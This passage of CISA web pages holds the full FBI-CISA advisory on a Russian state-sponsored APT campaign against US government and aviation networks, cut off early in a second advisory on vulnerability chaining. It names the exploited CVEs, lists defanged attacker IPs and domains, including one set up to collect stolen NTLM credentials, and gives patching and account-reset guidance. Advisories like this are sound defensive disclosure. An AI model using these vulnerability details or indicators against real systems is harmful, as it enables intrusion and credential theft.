href="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF">[6] NSA & ASD "CyberSecurity Information: Detect and Prevent Web Shell Malware" </a></li> <li><a href="https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs">[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs: </a></li> <li><a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">[8] NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" </a></li> <li><a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm">[9] NSA “Building Web Applications – Security for Developers”: </a></li> <li><a href="https://owasp.org/www-project-top-ten/">[10] OWASP Top Ten</a></li> <li><a href="https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html">[11] 2020 CWE Top 25 Most Dangerous Software Weaknesses</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 22, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets
Original release date: October 22, 2020 | Last revised: November 17, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor tactics and techniques </em></p> <p>This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-283a">AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations</a>.</p> <p>Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.</p> <p>The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:</p> <ul> <li>Sensitive network configurations and passwords.</li> <li>Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).</li> <li>IT instructions, such as requesting password resets.</li> <li>Vendors and purchasing information.</li> <li>Printing access badges.</li> </ul> <p>To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.</p> <p>As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.</p> <ul> <li>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf">PDF</a> version of this report.</li> <li>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-296A.stix.xml">STIX</a> package of IOCs.</li> </ul> <h4>U.S. Heat Map of Activity</h4> <p><a href="https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769">Click here</a> for an interactive heat map of this activity. Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.</p> <p><strong>Note</strong>: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email <a href="https://us-cert.cisa.govmailto: info@us-cert.gov">info@us-cert.gov</a>. To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.</p> <p><strong>Note</strong>: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.</p> <h3>Technical Details</h3><p>The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses <code>213.74.101[.]65</code>, <code>213.74.139[.]196</code>, and <code>212.252.30[.]170</code> to connect to victim web servers (<em>Exploit Public Facing Application</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190/">T1190</a>]).</p> <p>The actor is using <code>213.74.101[.]65</code> and <code>213.74.139[.]196</code> to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (<em>Brute Force</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110">T1110</a>]; <em>Exploit Public Facing Application</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190/">T1190</a>]). The APT actor also hosted malicious domains, including possible aviation sector target <code>columbusairports.microsoftonline[.]host</code>, which resolved to <code>108.177.235[.]92</code> and <code>[cityname].westus2.cloudapp.azure.com</code>; these domains are U.S. registered and are likely SLTT government targets (<em>Drive-By Compromise </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1189">T1189</a>]).</p> <p>The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a>) and a Microsoft Exchange remote code execution flaw (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">CVE-2020-0688</a>).</p> <p>The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">CVE 2019-10149</a>) (<em>External Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1133">T1133</a>]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a>) for Initial Access [<a href="https://attack.mitre.org/versions/v7/tactics/TA0001/">TA0001</a>] and a Windows Netlogon vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a>) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [<a href="https://attack.mitre.org/versions/v7/tactics/TA0004/">TA0004</a>] within the network (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078">T1078</a>]). These vulnerabilities can also be leveraged to compromise other devices on the network (<em>Lateral Movement</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0008/">TA0008</a>]) and to maintain <em>Persistence</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003/">TA0003</a>]).</p> <p>Between early February and mid-September, these APT actors used <code>213.74.101[.]65</code>, <code>212.252.30[.]170</code>, <code>5.196.167[.]184</code>, <code>37.139.7[.]16</code>, <code>149.56.20[.]55</code>, <code>91.227.68[.]97</code>, and <code>5.45.119[.]124</code> to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078">T1078</a>]).</p> <h3>Mitigations</h3><h4>Indicators of Compromise</h4> <p>The APT actor used the following IP addresses and domains to carry out its objectives:</p> <ul> <li><code>213.74.101[.]65</code></li> <li><code>213.74.139[.]196</code></li> <li><code>212.252.30[.]170</code></li> <li><code>5.196.167[.]184</code></li> <li><code>37.139.7[.]16</code></li> <li><code>149.56.20[.]55</code></li> <li><code>91.227.68[.]97</code></li> <li><code>138.201.186[.]43</code></li> <li><code>5.45.119[.]124</code></li> <li><code>193.37.212[.]43</code></li> <li><code>146.0.77[.]60</code></li> <li><code>51.159.28[.]101</code></li> <li><code>columbusairports.microsoftonline[.]host</code></li> <li><code>microsoftonline[.]host</code></li> <li><code>email.microsoftonline[.]services</code></li> <li><code>microsoftonline[.]services</code></li> <li><code>cityname[.]westus2.cloudapp.azure.com</code></li> </ul> <p>IP address <code>51.159.28[.]101</code> appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address <code>51.159.28[.]101</code> (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).</p> <p>Organizations should check available logs for traffic to/from IP address <code>51.159.28[.]101</code> for indications of credential-harvesting activity. As the APT actors likely have—or will—establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.</p> <p>Refer to <a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-296A.stix.xml">AA20-296A.stix</a> for a downloadable copy of IOCs.</p> <h4>Network Defense-in-Depth</h4> <p>Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.</p> <ul> <li>Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.</li> </ul> <p class="text-align-center"><em>Table 1: Patch information for CVEs</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.467px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 198px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 311px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 356px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Citrix Application Delivery Controller</li> <li>Citrix Gateway</li> <li>Citrix SDWAN WANOP</li> </ul> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 356px;"> <p><a href="https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></p> <p><a href="https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/">Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></p> <p><a href="https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></p> <p><a href="https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">CVE-2020-0688</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li> <li>Microsoft Exchange Server 2013 Cumulative Update 23</li> <li>Microsoft Exchange Server 2016 Cumulative Update 14</li> <li>Microsoft Exchange Server 2016 Cumulative Update 15</li> <li>Microsoft Exchange Server 2019 Cumulative Update 3</li> <li>Microsoft Exchange Server 2019 Cumulative Update 4</li> </ul> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 356px;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688">Microsoft Security Advisory for CVE-2020-0688</a></td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">CVE-2019-10149</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Exim versions 4.87–4.91</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"><a href="https://www.exim.org/static/doc/security/CVE-2019-10149.txt">Exim page for CVE-2019-10149</a></td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>FortiOS 6.0: 6.0.0 to 6.0.4</li> <li>FortiOS 5.6: 5.6.3 to 5.6.7</li> <li>FortiOS 5.4: 5.4.6 to 5.4.12</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"><a href="https://www.fortiguard.com/psirt/FG-IR-18-384">Fortinet Security Advisory: FG-IR-18-384</a></td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2016</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903&nbsp; (Server Core installation)</li> <li>Windows Server, version 1909&nbsp; (Server Core installation)</li> <li>Windows Server, version 2004&nbsp;&nbsp; (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"> <p><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">Microsoft Security Advisory for CVE-2020-1472</a></p> <p>&nbsp;</p> </td> </tr> </tbody> </table> <p>&nbsp;</p> <ul> <li>Follow Microsoft’s <a href="https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc">guidance</a> on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.</li> <li>If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on <a href="https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices">SMB Security Best Practices</a> for more information.</li> <li>Implement the prevention, detection, and mitigation strategies outlined in: <ul> <li>CISA Alert <a href="https://us-cert.cisa.gov/ncas/alerts/TA15-314A">TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance</a>.</li> <li>National Security Agency Cybersecurity Information Sheet <a href="https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/">U/OO/134094-20 – Detect and Prevent Web Shells Malware</a>.</li> </ul> </li> <li>Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.</li> <li>Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.</li> <li>Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from <code>PROGRAMFILES</code>, <code>PROGRAMFILES(X86)</code>, and <code>WINDOWS</code> folders. All other locations should be disallowed unless an exception is granted.</li> <li>Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.</li> </ul> <h4>Comprehensive Account Resets</h4> <p>For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized <a href="https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts">guidance</a> for this. Such a reset should be performed very carefully if needed.</p> <p>If there is an observation of <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise—as well as in Azure-hosted—AD instances.</p> <p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p> <p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.</p> <ol> <li>Create a temporary administrator account, and use this account only for all administrative actions</li> <li>Reset the Kerberos Ticket Granting Ticket <code>(krbtgt</code>) password;[<a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">1</a>] this must be completed before any additional actions (a second reset will take place in step 5)</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>&nbsp;Reset all account passwords (passwords should be 15 characters or more and randomly assigned): <ol type="a"> <li>User accounts (forced reset with no legacy password reuse)</li> <li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li> <li>Service accounts</li> <li>Directory Services Restore Mode (DSRM) account</li> <li>Domain Controller machine account</li> <li>Application passwords</li> </ol> </li> <li>Reset the<code> krbtgt</code> password again</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>Reboot domain controllers</li> <li>Reboot all endpoints</li> </ol> <p>The following accounts should be reset:</p> <ul> <li>AD Kerberos Authentication Master (2x)</li> <li>All Active Directory Accounts</li> <li>All Active Directory Admin Accounts</li> <li>All Active Directory Service Accounts</li> <li>All Active Directory User Accounts</li> <li>DSRM Account on Domain Controllers</li> <li>Non-AD Privileged Application Accounts</li> <li>Non-AD Unprivileged Application Accounts</li> <li>Non-Windows Privileged Accounts</li> <li>Non-Windows User Accounts</li> <li>Windows Computer Accounts</li> <li>Windows Local Admin</li> </ul> <h4>VPN Vulnerabilities</h4> <p>Implement the following recommendations to secure your organization’s VPNs:</p> <ul> <li><strong>Update VPNs, network infrastructure devices, and devices</strong> being used to remote into work environments with the latest software patches and security configurations. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">Understanding Patches and Software Updates</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates.</li> <li><strong>Implement MFA on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">Choosing and Protecting Passwords</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST05-012">Supplementing Passwords</a> for more information.</li> </ul> <p>Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p> <ul> <li><strong>Audit </strong>configuration and patch management programs.</li> <li><strong>Monitor </strong>network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).</li> <li><strong>Implement</strong> MFA, especially for privileged accounts.</li> <li><strong>Use</strong> separate administrative accounts on separate administration workstations.</li> <li><strong>Keep </strong><a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">software up to date</a>. Enable automatic updates, if available.</li> </ul> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="https://us-cert.cisa.govmailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p> <h3>Resources</h3> <ul> <li>APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations – <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-283a">https://us-cert.cisa.gov/ncas/alerts/aa20-283a</a></li> <li>CISA Activity Alert CVE-2019-19781 – <a href="https://us-cert/cisa.gov/ncas/alerts/aa20-031a">https://us-cert/cisa.gov/ncas/alerts/aa20-031a</a></li> <li>CISA Vulnerability Bulletin – <a href="https://us-cert/cisa.gov/ncas/bulletins/SB19-161">https://us-cert/cisa.gov/ncas/bulletins/SB19-161</a></li> <li>CISA Current Activity – <a href="https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688">https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688</a></li> <li>Citrix Directory Traversal Bug (CVE-2019-19781) – <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">https://nvd.nist.gov/vuln/detail/CVE-2019-19781</a></li> <li>Microsoft Exchange remote code execution flaw (CVE-2020-0688) – <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">https://nvd.nist.gov/vuln/detail/CVE-2020-0688</a></li> <li>CVE-2018-13379 – <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379 ">https://nvd.nist.gov/vuln/detail/CVE-2018-13379</a></li> <li>CVE-2020-1472 – <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">https://nvd.nist.gov/vuln/detail/CVE-2020-1472</a></li> <li>CVE 2019-10149 – <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">https://nvd.nist.gov/vuln/detail/CVE-2019-10149</a></li> <li>NCCIC/USCERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance – <a href="https://us-cert.cisa.gov/ncas/alerts/TA15-314A ">https://us-cert.cisa.gov/ncas/alerts/TA15-314A</a></li> <li>NCCIC/US-CERT publication on SMB Security Best Practices – <a href="https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices">https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices</a><br /> &nbsp;</li> </ul> <div class="special_container text-align-center">&nbsp;</div> <div class="special_container text-align-center"><strong><em>DISCLAIMER</em></strong></div> <div class="special_container">&nbsp;</div> <div class="special_container"> <p><em>This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p> <p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p> </div> <p><o:p></o:p></p> <h3>References</h3> <ul> <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 22, 2020: Initial Version</li> <li>November 17, 2020: Added U.S. Heat Map of Activity</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
Original release date: October 9, 2020 | Last revised: October 24, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p><strong>Note:</strong> the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure&nbsp;Security Agency (CISA) will update this advisory as new information is available.</p> <p>This joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI).&nbsp;</p> <p>CISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability—<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a>—in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application.&nbsp;</p> <p>This recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.</p> <p>CISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.</p> <p>Some common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a> has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a>. While these exploits have been observed recently, this activity is ongoing and still unfolding.</p> <p>After gaining initial access, the actors exploit <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.</p> <p>CISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1631">CVE-2020-1631</a>, Pulse Secure <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a>, Citrix NetScaler <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a>, and Palo Alto Networks <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2021">CVE-2020-2021</a> (this list is not considered exhaustive).</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-283A-APT_Actors_Chaining_Vulnerabilities.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><h3>Initial Access</h3> <p>APT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (<em>Exploit Public-Facing Application</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190/">T1190</a>], <em>External Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a>.</p> <p>Although not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.</p> <ul> <li>Citrix NetScaler <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></li> <li>MobileIron <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a></li> <li>Pulse Secure <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a></li> <li>Palo Alto Networks <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2021">CVE-2020-2021</a></li> <li>F5 BIG-IP <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a></li> </ul> <h4>Fortinet FortiOS SSL VPN CVE-2018-13379</h4> <p><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a> is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[<a href="https://www.fortiguard.com/psirt/FG-IR-18-384">1</a>]</p> 